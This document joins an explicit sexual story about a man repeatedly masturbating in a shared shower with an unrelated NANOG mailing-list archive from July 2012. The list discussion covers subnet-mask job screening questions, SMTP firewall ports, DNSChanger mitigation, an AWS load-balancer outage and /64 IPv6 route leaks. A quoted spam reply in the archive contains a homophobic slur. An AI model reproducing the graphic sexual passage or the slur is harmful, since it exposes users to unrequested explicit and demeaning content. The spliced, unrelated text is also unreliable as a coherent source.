?Mmnh. Ungh? Chris could hear the other guy?s voice as he evidently began to enjoy himself as well. He hesitated, but the insistent demands of his monster were just too urgent to ignore. He resumed his masturbation, first just stroking his gargantuan boner, then resuming the hip-swinging thrusts that felt so incredible. Before long, both guys were audibly grunting and moaning. Chris heard the bathroom door open again. Awww, man! Not now!He stopped his thrusting, but continued to stroke his aching cock. I can?t just stop.As he heard feet patting across the tile floor to the shower right next to him, Chris was amazed to hear the first guy continue to grunt and moan as he stroked himself. That guy has no shame! Or maybe he?s just too horny to care.As Chris continued to caress his gigantic prick quietly, the water in the shower next to him came on, and he heard a loud expulsion of breath. ?Whew. Fuck, yeah.? A different voice in the adjacent shower startled Chris, momentarily interrupting his rhythm. Slow grunting told him that this guy was jerking off too. Screw these guys! If they?re not embarassed about it, why should I be? I guarantee you I?m hornier than both of them put together.Chris began to jerk off in earnest, bucking his hips to slide as much of his fat rod through his hands as possible. ?Unh. Ungh.? Chris started to grunt, even doing it a little louder, deliberately. The other two voices responded in kind, all three guys becoming quite audible. Neither guy said more than the occasional ?fuck? or ?yeah?, and the acoustics and the running water muffled their voices, so Chris couldn?t identify either of them. None of them was very shy about what they were doing, though, even when one of the others came to a loud, gasping orgasm. Chris was about to follow him when the bathroom doors opened again. Not stopping now. Feels too good to stop.As his massive cock began to erupt in a geyser of cum, Chris could hear a fourth guy slide back a shower curtain and start up a shower. ?Fuck! Unh! Uhn! Uhn!? Chris continued stroking as his balls pumped again and again, flooding the stall with a pint or more of cum. ?Hell, yeah!?, said a quiet voice from the next stall. All three of the showering guys continued to stroke themselves, grunting and moaning. Though a pint of jizz was slowly seeping down the drain, Chris grabbed his hard dick and began to stroke himself again. I?m not stopping if they aren?t. Nobody can outlast this dick.As he resumed his thrusting, he began vocalizing even louder. ?Holy shit!? breathed one of the other guys. That expression of amazement galvanized Chris and he began to buck and pump with wild abandon. Damn right! Nobody?s got a cock like this! With the loud sounds of the other three guys also jerking off, Chris eventually brought himself to a second massive ejaculation. A couple of them came before he did, but his was definitely the longest, again, and the loudest. With barely a pause to finish cumming, Chris resumed stroking his rock-hard wang, thrusting madly and grunting like an animal. He could hear the other guys, but after the first few strokes, he became totally focused on grappling with his giant beast. Gotta take care of the monster. Need it all the time. Fuck, this feels so good. Chris?s colossal rod was far too long to thrust horizontally, unless he wanted to stick half a foot of it out of the shower, so he was leaning back low against the shower wall and thrusting his hips upward, bringing his cock upwards on each thrust. This allowed him to roam his hands over the entire length of his fat prick on each stroke, before rubbing his glans at the end of each stroke. As he got more and more involved in his masturbation, Chris?s stance altered, and he could feel the huge expanse of his cockhead touching the shower curtain at the end of each stroke, pushing it outward slightly. He was too far gone to be concerned, however. Chris finally reached his third, volcanic orgasm with a loud, guttural grunt. His first spurt of cum shot out all over the shower curtain with an audible splash, followed by a second, and third, and so on, until, a dozen surges later, Chris had pumped another pint or so of cum all over the interior of the shower, accompanied by loud moans and grunts with each ejaculation. Oh, yeah! What do you guys think of that?Chris finally paused in his frenzied masturbation, and realized that the shower room was quiet, other than his own shower. There was no sound of others showering, and no other voices echoing against the tiles. ________________________________ From: Jon Lewis To: valdis.kletnieks at vt.edu Cc: nanog at nanog.org Sent: Saturday, July 7, 2012 6:34 PM Subject: Re: job screening question On Sat, 7 Jul 2012 valdis.kletnieks at vt.edu wrote: > On Sat, 07 Jul 2012 18:03:43 -0700, Randy said: >>> "What's the problem with using 255.255.255.247 as a subnet mask if you >>> want to make a LAN subnet with 12 hosts?" >>> (5 word answer) > > I'm not sure if that's a typo or excessive evil on the part of the questioner. ;) > >> My response would be: Discontiguous subnet masks were allowed in the pre-CIDR era. > > Yes, but even if it was *legal*, the "subnet doesn't contain 12 addresses" answer applies. ;) It's just a mask...you can do all sorts of crazy things with netmasks. The results of using "unusual" ones is not typically predictable or desireable to those who might accidentally use them. ---------------------------------------------------------------------- Jon Lewis, MCP :)? ? ? ? ? |? I route Senior Network Engineer? ? |? therefore you are Atlantic Net? ? ? ? ? ? ? ? | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From ops.lists at gmail.com Sat Jul 7 21:07:29 2012 From: ops.lists at gmail.com (Suresh Ramasubramanian) Date: Sun, 8 Jul 2012 07:37:29 +0530 Subject: July DNS In-Reply-To: <1341710615.61091.YahooMailNeo@web142503.mail.bf1.yahoo.com> References: <1341710615.61091.YahooMailNeo@web142503.mail.bf1.yahoo.com> Message-ID: Did hipcrime turn his talents to nanog? On Sun, Jul 8, 2012 at 6:53 AM, NIG NOG wrote: > The guard?s face > reddened again, and the veins in his thick neck stood out. ?I said take > offyour pants, faggot!You can?t hide your tiny little cock any more! -- Suresh Ramasubramanian (ops.lists at gmail.com) From owen at delong.com Sat Jul 7 21:32:25 2012 From: owen at delong.com (Owen DeLong) Date: Sat, 7 Jul 2012 19:32:25 -0700 Subject: job screening question In-Reply-To: <6287cebd84702948aa393809d67e39e0@mail.dessus.com> References: <6287cebd84702948aa393809d67e39e0@mail.dessus.com> Message-ID: <9BE5895A-B8CE-4EDD-AF20-AC3FA1BCA623@delong.com> On Jul 7, 2012, at 5:44 PM, Keith Medcalf wrote: >> "What's the problem with using 255.255.255.247 as a subnet mask if you >> want to make a LAN subnet with 12 hosts?" >> (5 word answer) > > Unemployment Office Is That Way -> > > Is the only 5 word answer I could come up with. The correct answer "invalid netmask", is only two words. > LoL... Even if you allowed for discontiguous subnet masks, you'd need to use 255.255.255.243 and not 255.255.255.247 to achieve 12 hosts. Not sure what 5 word answer you're looking for, but Keith's answer and mine are the two most obvious issues I can think of. > >> "What TCP destination port numbers should be allowed through the >> perimeter stateful firewall device to and from a mail server whose >> only purpose is to proxy SMTP mail from internal sources?" >> (one number answer) > > Short Answer: There is no answer to the question that can be expressed in one number. Sure there is, if you count "none" as a number. > Outbound connections to TCP destination port 25 only. Returning traffic (including associated ICMP) should be automatically handled by your stateful inspection firewall. If not, you need to buy a better firewall. I'd allow 25 and 465 outbound, myself. No reason to block SSL if the remote side offers the capability. ICMP wouldn't be a TCP destination port number anyway. > Any applicant who provides any answer should the rejected out of hand as (a) being unable to read (b) being a threat to security. LoL... Some truth to that. Owen From kmedcalf at dessus.com Sat Jul 7 22:31:32 2012 From: kmedcalf at dessus.com (Keith Medcalf) Date: Sat, 07 Jul 2012 21:31:32 -0600 Subject: FW: job screening question In-Reply-To: <2f05fd19e52aa34682f92ba133eb60ef@mail.dessus.com> Message-ID: <11b81849e3bdac41b79ab4ded81e5844@mail.dessus.com> (now copied to list as well) On Sat 07 July, 2012 at 20:32, Owen DeLong wrote: >>> "What TCP destination port numbers should be allowed through the >>> perimeter stateful firewall device to and from a mail server whose >>> only purpose is to proxy SMTP mail from internal sources?" >>> (one number answer) >> Short Answer: There is no answer to the question that can be expressed in >> one number. > Sure there is, if you count "none" as a number. None, NIL, NUL, NULL would be valid I suppose if nulls were permitted. 0 however is not correct. >> Outbound connections to TCP destination port 25 only. Returning traffic >> (including associated ICMP) should be automatically handled by your stateful >> inspection firewall. If not, you need to buy a better firewall. > I'd allow 25 and 465 outbound, myself. No reason to block SSL if the remote > side offers the capability. http://www.imc.org/ietf-apps-tls/mail-archive/msg00204.html SMTPS is deprecated and port 465 is no longer registered for SMTPS (SMTP over SSL), it is now for urd tcp URL Rendesvous Directory for SSM 465 So even though many folks may still run SMTPS on port 465, you SHOULD be using STARTTLS on port 25. > ICMP wouldn't be a TCP destination port number anyway. Very true. The again, there is a significant proportion of the same experts who think DNS only runs over UDP ... > > Any applicant who provides any answer should the rejected out of hand as > (a) being unable to read (b) being a threat to security. > LoL... Some truth to that. You would be surprised how many people think that if you permit tcp host x.x.x.x any eq 25 to let traffic out, then you need permit tcp any eq 25 host x.x.x.x as the inverse to permit returning traffic. This is more of a problem when using packet filtering than it is when configuring stateful inspection firewalls. Nonetheless, the question does ask what should be opened "to and from" in order to "proxy SMTP mail from internal sources". It could of course just be a brilliant question designed to detect such problems ... > Owen Keith --- () ascii ribbon campaign against html e-mail /\ www.asciiribbon.org From mysidia at gmail.com Sat Jul 7 23:09:54 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Sat, 7 Jul 2012 23:09:54 -0500 Subject: job screening question In-Reply-To: <6287cebd84702948aa393809d67e39e0@mail.dessus.com> References: <6287cebd84702948aa393809d67e39e0@mail.dessus.com> Message-ID: On 7/7/12, Keith Medcalf wrote: >>"What's the problem with using 255.255.255.247 as a subnet mask if you >>want to make a LAN subnet with 12 hosts?" >> (5 word answer) > Unemployment Office Is That Way -> > Is the only 5 word answer I could come up with. The correct answer "invalid > netmask", is only two words. 5 words = "The netmask is not valid." Also acceptable response; "A netmask must be contiguous." > Short Answer: There is no answer to the question that can be expressed in > one number. Acceptable answers: "None", or "25" Unacceptable answers: any number other than 25, or anything other than a one-word answer. (After your rep has told them that you expect a one-word answer, of course.) -- -JH From bonomi at mail.r-bonomi.com Sun Jul 8 02:12:10 2012 From: bonomi at mail.r-bonomi.com (Robert Bonomi) Date: Sun, 8 Jul 2012 02:12:10 -0500 (CDT) Subject: job screening question In-Reply-To: Message-ID: <201207080712.q687CA7m072035@mail.r-bonomi.com> > From nanog-bounces+bonomi=mail.r-bonomi.com at nanog.org Sat Jul 7 23:11:09 2012 > Date: Sat, 7 Jul 2012 23:09:54 -0500 > Subject: Re: job screening question > From: Jimmy Hess > To: Keith Medcalf > Cc: "nanog at nanog.org" > > On 7/7/12, Keith Medcalf wrote: > >>"What's the problem with using 255.255.255.247 as a subnet mask if you > >>want to make a LAN subnet with 12 hosts?" > >> (5 word answer) > > Unemployment Office Is That Way -> Is the only 5 word answer I could > > come up with. The correct answer "invalid netmask", is only two words. > > 5 words = "The netmask is not valid." > Also acceptable response; "A netmask must be contiguous." "Subnet/Netmask is '/31'-equivalennt, unusable." "Subnet too small/tiny/miniscule/{other synonyms} too use." "Invalid netmask under CIDR rules" (also transpose first two words) "Invalid netmask according to RFC[mumble}" (also transpose first two words) "Too many hosts for subnet." "Twelve hosts will not fit." "You've _got_ to be kidding!" "Apparent bit-rot in questions database" If _written_, I't be tempted to respond: A) Netmask is '/31'-equivalent, unusable B) Invalid netmask under CIDR rules C) Apparent bit-rot in questions database D) Question probably itended LSB 248. E) Not enough bits in subnet F) too many hosts for subnet G) all of the above respones and then circle G. <*EVIL* grin> From ispbuilder at gmail.com Sun Jul 8 05:49:00 2012 From: ispbuilder at gmail.com (Mike) Date: Sun, 08 Jul 2012 07:49:00 -0300 Subject: Running your own DNSchanger proxies In-Reply-To: References: Message-ID: <4FF9659C.5090601@gmail.com> On 12-07-07 10:13 PM, Jason Duerstock wrote: > As an intellectual exercise, I think this is interesting and worth the > effort. As an actual implementation, I think it's more effective to block > DNS traffic to the affected subnets. Let the breakage occur, and then let > the end users get their broken machines fixed rather than let them continue > hobbling along with this hack in place. > > Jason Agreed, fixing the problem > patching the problem. Some other ideas - * Assuming you're running the nameserver under Linux, an iptables rule would remove the need to have all the ip addresses added (iptables -I PREROUTING -t nat -d $badblock/24 -s 0.0.0.0/0 -j DNAT --to your.local.ip.address) * bind should by default accept connections on all interfaces if you don't tell it to bind to anything, unless behaviour has changed in versions more recent than my last bind experience * Having whatever nameserver you use return a single IP address for everything you request, which points you to a single web page that explains how to fix the problem can be good * that single IP address can also run a pop3/imap server that accepts any username/password and dumps the user into a read-only mailbox with a single message saying "fix your infected PC" From mattias at ahnberg.pp.se Sun Jul 8 09:46:03 2012 From: mattias at ahnberg.pp.se (Mattias Ahnberg) Date: Sun, 08 Jul 2012 16:46:03 +0200 Subject: job screening question In-Reply-To: References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> <4FF87979.3010308@gmail.com> <20120707181318.GF2221@hezmatt.org> Message-ID: <4FF99D2B.1030406@ahnberg.pp.se> On 2012-07-08 00:58, Jimmy Hess wrote: > "What's the problem with using 255.255.255.247 as a subnet mask if you > want to make a LAN subnet with 12 hosts?" > (5 word answer) I don't much appreciate these types of questions where you expect an exact answer based on your own phrasing/ideas. If running through a form with questions like this, leave space for open-ended answers to give the person a chance to phrase and explain in his own ways. Don't let the final "pass" or "no pass" fall to a HR person who can't fully appreciate or know the details and see the actual clue in an unexpected answer. You might lose a lot of really good candidates by being too harsh on that. Its benefical to build a team of clued people with the right personality, interest and mentality to what they do rather than seek people who has taught themselves how to answer certification tests in a way they know the creator of the test expects them. :) Hire for attitude, train for skill! -- /ahnberg. From matthew at matthew.at Sun Jul 8 12:58:34 2012 From: matthew at matthew.at (Matthew Kaufman) Date: Sun, 8 Jul 2012 10:58:34 -0700 Subject: job screening question In-Reply-To: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> References: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> Message-ID: <2F83F98F-3EE4-480D-8470-2F92C5B04142@matthew.at> On Jul 7, 2012, at 6:03 PM, Randy wrote: > > .... >> "When a number received in an IP packet is presented in >> network byte >> order, and the host architecture is big endian, what >> must be done to >> convert the number into host byte order?" >> (one word answer) > > My response would be to have a field-day with HR talking about MSB and LSB. > Certainly wouldn't be a one-word answer. So HR disqualifies me? >> >> "What's the problem with using 255.255.255.247 as a subnet >> mask if you >> want to make a LAN subnet with 12 hosts?" >> (5 word answer) > > My response would be: Discontiguous subnet masks were allowed in the pre-CIDR era. If you so desire, give me about 2 hours since I do not have a scientific calculator handy; and I will get back to you with the complete-list. > > Definitely not 5 words as required from the HR stand point. So I get disqualified again! > > ./Randy > Oh, come on, 247 decimal is 0xf7... A single zero bit in the mask isn't enough for 12 hosts no matter where it is. If you need a scientific calculator and 2 hours for that, HR is right. Matthew Kaufman Sent from my iPad From mysidia at gmail.com Sun Jul 8 14:23:31 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Sun, 8 Jul 2012 14:23:31 -0500 Subject: job screening question In-Reply-To: <2F83F98F-3EE4-480D-8470-2F92C5B04142@matthew.at> References: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> <2F83F98F-3EE4-480D-8470-2F92C5B04142@matthew.at> Message-ID: On 7/8/12, Matthew Kaufman wrote: > On Jul 7, 2012, at 6:03 PM, Randy wrote: >> My response would be: Discontiguous subnet masks were allowed in the >> pre-CIDR era. If you so desire, give me about 2 hours since I do not have See, I would advocate using the filter questions for sorting the apps, and tell the applicants "We're expecting a 5 words or less answer, not a history lesson or technical explanation."; if more than 25% of applicants out of say 1000 get it correct, then the filter is considered valid, and the ones that pass the most filter questions are the least likely to not be a waste of time. I'm not sure which era exactly in which you consider it legal and kosher to assign to a network, but even if you relax all the rules that require contiguity, it is still an illegal network mask for end hosts, just like 255.255.255.254 is; if an applicant doesn't flag it out as bad/invalid subnet mask in this era, then they might fail the filter, even if they correctly observe that you can't fit that many hosts in. >> a scientific calculator handy; and I will get back to you with the >> complete-list. A what? >> Definitely not 5 words as required from the HR stand point. So I get >> disqualified again! >> ./Randy > Oh, come on, 247 decimal is 0xf7... A single zero bit in the mask isn't > enough for 12 hosts no matter where it is. Correct... it's not even enough bits for 1 end host; it's enough bits for 1 broadcast address. > If you need a scientific calculator and 2 hours for that, HR is right. > Matthew Kaufman > Sent from my iPad -- -JH From william.mccall at gmail.com Sun Jul 8 14:57:34 2012 From: william.mccall at gmail.com (William McCall) Date: Sun, 8 Jul 2012 14:57:34 -0500 Subject: job screening question In-Reply-To: References: <1341709423.14571.YahooMailClassic@web184702.mail.ne1.yahoo.com> <2F83F98F-3EE4-480D-8470-2F92C5B04142@matthew.at> Message-ID: On Sun, Jul 8, 2012 at 2:23 PM, Jimmy Hess wrote: > I'm not sure which era exactly in which you consider it legal and > kosher to assign to a network, but even if you relax all the rules > that require contiguity, it is still an illegal network mask for end > hosts, just like 255.255.255.254 is; if an applicant doesn't flag it > out as bad/invalid subnet mask in this era, then they might fail the > filter, > Well, the correct answer is that it IS invalid (because the real world routers tell us so) and this should be the only acceptable answer, but, just to be sure, /31s are valid, can be used, and are used. -- William McCall From tvhawaii at shaka.com Sun Jul 8 15:18:59 2012 From: tvhawaii at shaka.com (Michael Painter) Date: Sun, 8 Jul 2012 10:18:59 -1000 Subject: job screening question References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> <4FF87979.3010308@gmail.com> <20120707181318.GF2221@hezmatt.org> <4FF99D2B.1030406@ahnberg.pp.se> Message-ID: <073348E566D64983816610E1804660AE@owner59e1f1502> Mattias Ahnberg wrote: > Its benefical to build a team of clued people with the right personality, > interest and mentality to what they do rather than seek people who has > taught themselves how to answer certification tests in a way they know > the creator of the test expects them. :) Just came across this tidbit: Technical Terms of Computer Science #515: "Certification: A business model that compresses hot air to paper, then trades it for currency." From tyler.haske at gmail.com Sun Jul 8 15:31:35 2012 From: tyler.haske at gmail.com (Tyler Haske) Date: Sun, 8 Jul 2012 16:31:35 -0400 Subject: job screening question In-Reply-To: <073348E566D64983816610E1804660AE@owner59e1f1502> References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz> <20120707040658.GC2221@hezmatt.org> <4FF87979.3010308@gmail.com> <20120707181318.GF2221@hezmatt.org> <4FF99D2B.1030406@ahnberg.pp.se> <073348E566D64983816610E1804660AE@owner59e1f1502> Message-ID: Cheaper then a college degree and doesn't require you to 'know the right person.' > Technical Terms of Computer Science #515: > > "Certification: A business model that compresses hot air to paper, > then trades it for currency." From steve at pirk.com Sun Jul 8 19:27:11 2012 From: steve at pirk.com (steve pirk [egrep]) Date: Sun, 8 Jul 2012 17:27:11 -0700 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: On Tue, Jul 3, 2012 at 1:00 PM, Ryan Malayter wrote: > Doing it the right way makes the cloud far less cost-effective and far > less "agile". Once you get it all set up just so, change becomes very > difficult. All the monitoring and fail-over/fail-back operations are > generally application-specific and provider-specific, so there's a lot > of lock-in. Tools like RightScale are a step in the right direction, > but don't really touch the application layer. You also have to worry > about the availability of yet another provider! > I am pretty sure Netflix and others were "trying to do it right", as they all had graceful fail-over to a secondary AWS zone defined. It looks to me like Amazon uses DNS round-robin to load balance the zones, because they mention returning a "list" of addresses for DNS queries, and explains the failure of the services to shunt over to other zones in their postmortem. > Elastic Load Balancers (ELBs) allow web traffic directed at a single IP > address to be spread across many EC2 instances. They are a tool for high > availability as traffic to a single end-point can be handled by many > redundant servers. ELBs live in individual Availability Zones and front EC2 > instances in those same zones or in other Availability Zones. > ELBs can also be deployed in multiple Availability Zones. In this > configuration, each Availability Zone?s end-point will have a separate IP > address. A single Domain Name will point to all of the end-points? IP > addresses. When a client, such as a web browser, queries DNS with a Domain > Name, it receives the IP address (?A?) records of all of the ELBs in random > order. While some clients only process a single IP address, many (such as > newer versions of web-browsers) will retry the subsequent IP addresses if > they fail to connect to the first. A large number of non-browser clients > only operate with a single IP address. > During the disruption this past Friday night, the control plane (which > encompasses calls to add a new ELB, scale an ELB, add EC2 instances to an > ELB, and remove traffic from ELBs) began performing traffic shifts to > account for the loss of load balancers in the affected Availability Zone. > As the power and systems returned, a large number of ELBs came up in a > state which triggered a bug we hadn?t seen before. The bug caused the ELB > control plane to attempt to scale these ELBs to larger ELB instance sizes. > This resulted in a sudden flood of requests which began to backlog the > control plane. At the same time, customers began launching new EC2 > instances to replace capacity lost in the impacted Availability Zone, > requesting the instances be added to existing load balancers in the other > zones. These requests further increased the ELB control plane backlog. > Because the ELB control plane currently manages requests for the US East-1 > Region through a shared queue, it fell increasingly behind in processing > these requests; and pretty soon, these requests started taking a very long > time to complete. > http://aws.amazon.com/message/67457/ > *In reality, though, Amazon data centers have outages all the time. In > fact, Amazon tells its customers to plan for this to happen, and to be > ready to roll over to a new data center whenever there?s an outage.* > > *That?s what was supposed to happen at Netflix Friday night. But it > didn?t work out that way. According to Twitter messages from Netflix > Director of Cloud Architecture Adrian Cockcroft and Instagram Engineer Rick > Branson, it looks like an Amazon Elastic Load Balancing service, designed > to spread Netflix?s processing loads across data centers, failed during the > outage. Without that ELB service working properly, the Netflix and Pintrest > services hosted by Amazon crashed.* http://www.wired.com/wiredenterprise/2012/06/real-clouds-crush-amazon/ I am a big believer in using hardware to load balance data centers, and not leave it up to software in the data center which might fail. Speaking of services like RightScale, Google announced Compute Engine at Google I/O this year. BuildFax was an early Adopter, and they gave it great reviews... http://www.youtube.com/watch?v=LCjSJ778tGU It looks like Google has entered into the VPS market. 'bout time... ;-] http://cloud.google.com/products/compute-engine.html --steve pirk From malayter at gmail.com Sun Jul 8 19:52:47 2012 From: malayter at gmail.com (Ryan Malayter) Date: Sun, 8 Jul 2012 19:52:47 -0500 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: <9E0AF842-7CD8-4A8B-9243-BAEB6738C408@gmail.com> On Jul 8, 2012, at 7:27 PM, "steve pirk [egrep]" wrote: > > I am pretty sure Netflix and others were "trying to do it right", as they all had graceful fail-over to a secondary AWS zone defined. Having a single company as an infrastructure supplier is not "trying to do it right" from an engineering OR business perspective. It's lazy. No matter how many "availability zones" the vendor claims. From me at anuragbhatia.com Mon Jul 9 01:17:54 2012 From: me at anuragbhatia.com (Anurag Bhatia) Date: Mon, 9 Jul 2012 11:47:54 +0530 Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? Message-ID: Hello everyone I was just looking around and say a major Indian provider Sify (AS9583) is announcing /64s via BGP along with main /32 which is their allocation from APNIC. inet6num: 2001:0E48::/32 netname: SILNET descr: Sify Limited descr: Value Added Network service provider country: IN admin-c: HS51-AP tech-c: HS51-AP status: ALLOCATED PORTABLE mnt-by: APNIC-HM mnt-lower: MAINT-IN-SIFY changed: hm-changed at apnic.net 20040211 changed: hm-changed at apnic.net 20060117 source: APNIC As per IPv6 prefixes announced by AS9583 via bgp.he.net - http://bgp.he.net/AS9583#_prefixes6 we can see multiple /64s. Prefix Description 2001:0e48::/32 Sify Limited [image: India] 2001:0e48:0000:0001::/64 Sify Limited [image: India] 2001:0e48:0000:0002::/64 Sify Limited [image: India] 2001:0e48:0000:0004::/64 Sify Limited [image: India] I see Tata Comm (Sify's upstream) is accepting /64s while Tinet (one of other upstream) is dropping and taking only /32. Other major backbones like HE, Level3 dropping but Telia still accepting. Pretty much mixed result. Is it simply a misconfiguration or there is some use of announcing /64s along with main /32? Thanks. -- Anurag Bhatia Web: anuragbhatia.com Skype: anuragbhatia.com Linkedin | Twitter| Google+ From graham at apolix.co.za Mon Jul 9 02:04:19 2012 From: graham at apolix.co.za (Graham Beneke) Date: Mon, 09 Jul 2012 09:04:19 +0200 Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? In-Reply-To: References: Message-ID: <4FFA8273.5060308@apolix.co.za> On 09/07/2012 08:17, Anurag Bhatia wrote: > I was just looking around and say a major Indian provider Sify (AS9583) is > announcing /64s via BGP along with main /32 which is their allocation from > APNIC. > > inet6num: 2001:0E48::/32 > netname: SILNET > > I see Tata Comm (Sify's upstream) is accepting /64s while Tinet (one of > other upstream) is dropping and taking only /32. Other major backbones like > HE, Level3 dropping but Telia still accepting. Pretty much mixed result. > > Is it simply a misconfiguration or there is some use of announcing /64s > along with main /32? I would hope its accidental. Most people I've spoken to won't even consider accepting longer prefixes than /48 and will typically also refuse to accept any prefixes where there are aggregate announces covering them. We're going to end up with a very nasty routing table if people start pumping all their /64s into it. -- Graham Beneke From aftab.siddiqui at gmail.com Mon Jul 9 02:09:13 2012 From: aftab.siddiqui at gmail.com (Aftab Siddiqui) Date: Mon, 9 Jul 2012 12:09:13 +0500 Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? In-Reply-To: References: Message-ID: > > > > As per IPv6 prefixes announced by AS9583 via bgp.he.net - > http://bgp.he.net/AS9583#_prefixes6 we can see multiple /64s. > > The question is why their upstreams are accepting /64? It shouldn't be at all otherwise just imagine how many /64s you have to deal with once IPv6 is in full swing. Regards, Aftab A. Siddiqui From joelja at bogus.com Mon Jul 9 02:45:39 2012 From: joelja at bogus.com (Joel jaeggli) Date: Mon, 09 Jul 2012 00:45:39 -0700 Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? In-Reply-To: References: Message-ID: <4FFA8C23.6080501@bogus.com> On 7/9/12 00:09 , Aftab Siddiqui wrote: >> >> >> >> As per IPv6 prefixes announced by AS9583 via bgp.he.net - >> http://bgp.he.net/AS9583#_prefixes6 we can see multiple /64s. you likely won't see them in your table though. >> > The question is why their upstreams are accepting /64? It shouldn't be at > all otherwise just imagine how many /64s you have to deal with once IPv6 > is in full swing. that vantage point of the collector is germain here since if there are more specifics either filtered or no export those routes might appear from the vantage point of an upstream (where the collector is used) but not elsewhere: so consider the cidr report 9583 SIFY-AS-IN Sify Limited Adjacency: 7 Upstream: 5 Downstream: 2 Upstream Adjacent AS list AS6939 HURRICANE - Hurricane Electric, Inc. AS10026 PACNET Pacnet Global Ltd AS6453 GLOBEINTERNET TATA Communications AS1273 CW Cable and Wireless Worldwide plc AS3257 TINET-BACKBONE Tinet SpA Downstream Adjacent AS list AS45184 DEN-ISP-AS-IN-AP Den Digital Entertainment Pvt. Ltd. AS ISP india AS17825 MAHINDRABT-AS-AP Tech Mahindra Ltd. Software Development Organisation India Announced IPv6 Prefixes Rank AS Type Originate Addr Space (pfx) Transit Addr space (pfx) Description 1337 AS9583 ORG+TRN Originate: 4294967296 /32.00 Transit: 131073 /47.00 SIFY-AS-IN Sify Limited Aggregation Suggestions This report does not take into account conditions local to each origin AS in terms of policy or traffic engineering requirements, so this is an approximate guideline as to aggregation possibilities. Rank AS AS Name Current Wthdw Aggte Annce Redctn % 1448 AS9583 SIFY-AS-IN Sify Limited 1 0 0 1 0 0.00% Prefix AS Path Aggregation Suggestion 2001:e48::/32 5539 1273 9583 and ask yourself are they really leaking /64s into the DFZ which are being accepted (they aren't) or do they have and adjacency with he.net [jjaeggli at net-oob1.ca2 ~]$ telnet route-views6.routeviews.org Trying 128.223.51.112... Connected to route-views6.routeviews.org (128.223.51.112). Escape character is '^]'. route-views6.routeviews.org> show ipv6 bgp 2001:0e48:0000:0001::/64 % Network not in table route-views6.routeviews.org> route-views6.routeviews.org> show ipv6 bgp 2001:0e48::/32 longer-prefixes BGP table version is 0, local router ID is 128.223.51.112 Status codes: s suppressed, d damped, h history, * valid, > best, i - internal, r RIB-failure, S Stale, R Removed Origin codes: i - IGP, e - EGP, ? - incomplete Network Next Hop Metric LocPrf Weight Path * 2001:e48::/32 2001:4810::1 0 33437 29748 6939 7473 9583 i * 2600:803::15 0 701 3549 9583 i * 2001:4830::5 361 0 30071 3549 9583 i * 2001:4830::e 0 0 30071 6453 9583 i * 2001:428::205:171:203:140 8000029 0 209 10026 9583 i * 2001:428::205:171:203:141 8000919 0 209 174 9583 i * 2001:428::205:171:203:138 8000051 0 209 3257 9583 i * 2607:4200:10::3 0 19214 12989 6939 10026 9583 i * 2607:4200:10::2 0 19214 12989 6939 10026 9583 i * 2001:200:901::5 0 7660 4635 10026 9583 i * 2001:418:0:1000::f002 1 0 2914 3257 9583 i * 2001:418:0:1000::f000 0 0 2914 174 9583 i * 2001:1890:111d::1 0 7018 174 9583 i * 2001:1620:1::203 1 0 13030 3257 9583 i * 2001:470:0:1a::1 0 6939 10026 9583 i *> 2001:668:0:4::2 10 0 3257 9583 i * 2001:240:100:ff::2497:2 0 2497 10026 9583 i * 2610:38:1::1 0 7781 6939 7473 9583 i Total number of prefixes 1 > Regards, > > Aftab A. Siddiqui > From geier at geier.ne.tz Mon Jul 9 03:13:42 2012 From: geier at geier.ne.tz (Frank Habicht) Date: Mon, 09 Jul 2012 11:13:42 +0300 Subject: Any advantage of announcing IPv6/64s Or purely misconfiguration? In-Reply-To: <4FFA8C23.6080501@bogus.com> References: <4FFA8C23.6080501@bogus.com> Message-ID: <4FFA92B6.9050400@geier.ne.tz> On 7/9/2012 10:45 AM, Joel jaeggli wrote: > On 7/9/12 00:09 , Aftab Siddiqui wrote: >>> >>> As per IPv6 prefixes announced by AS9583 via bgp.he.net - >>> http://bgp.he.net/AS9583#_prefixes6 we can see multiple /64s. > > you likely won't see them in your table though. as direct customer of 6453 I see them. :-( before starting to filter. 6453: will you filter them? Frank #sh bgp ipv6 u 2001:0E48::/32 lo BGP table version is 2543917, local router ID is 41.188.128.35 Status codes: s suppressed, d damped, h history, * valid, > best, i - internal, r RIB-failure, S Stale, m multipath, b backup-path, x best-external, f RT-Filter, a additional-path Origin codes: i - IGP, e - EGP, ? - incomplete Network Next Hop Metric LocPrf Weight Path *>i2001:E48::/32 2001:5A0:C00:400::5 0 30 0 6453 9583 i *>i2001:E48:0:1::/64 2001:5A0:C00:400::5 0 30 0 6453 9583 ? *>i2001:E48:0:2::/64 2001:5A0:C00:400::5 0 30 0 6453 9583 ? *>i2001:E48:0:4::/64 2001:5A0:C00:400::5 0 30 0 6453 9583 ? *>i2001:E48:0:5::/64 2001:5A0:C00:400::5 0 30 0 6453 9583 ? *>i2001:E48:0:6::/64 2001:5A0:C00:400::5 0 30 0 6453 9583 ? *>i2001:E48:0:7::/64 2001:5A0:C00:400::5 0 30 0 6453 9583 ? *>i2001:E48:0:8::/64 2001:5A0:C00:400::5 0 30 0 6453 9583 ? From gb10hkzo-nanog at yahoo.co.uk Mon Jul 9 06:42:29 2012 From: gb10hkzo-nanog at yahoo.co.uk (gb10hkzo-nanog at yahoo.co.uk) Date: Mon, 9 Jul 2012 12:42:29 +0100 (BST) Subject: FYI Netflix is down Message-ID: <1341834149.51473.YahooMailNeo@web29403.mail.ird.yahoo.com> Steve at pirk, I fail to grasp the concept in your argument. You do realise, do you not, that your 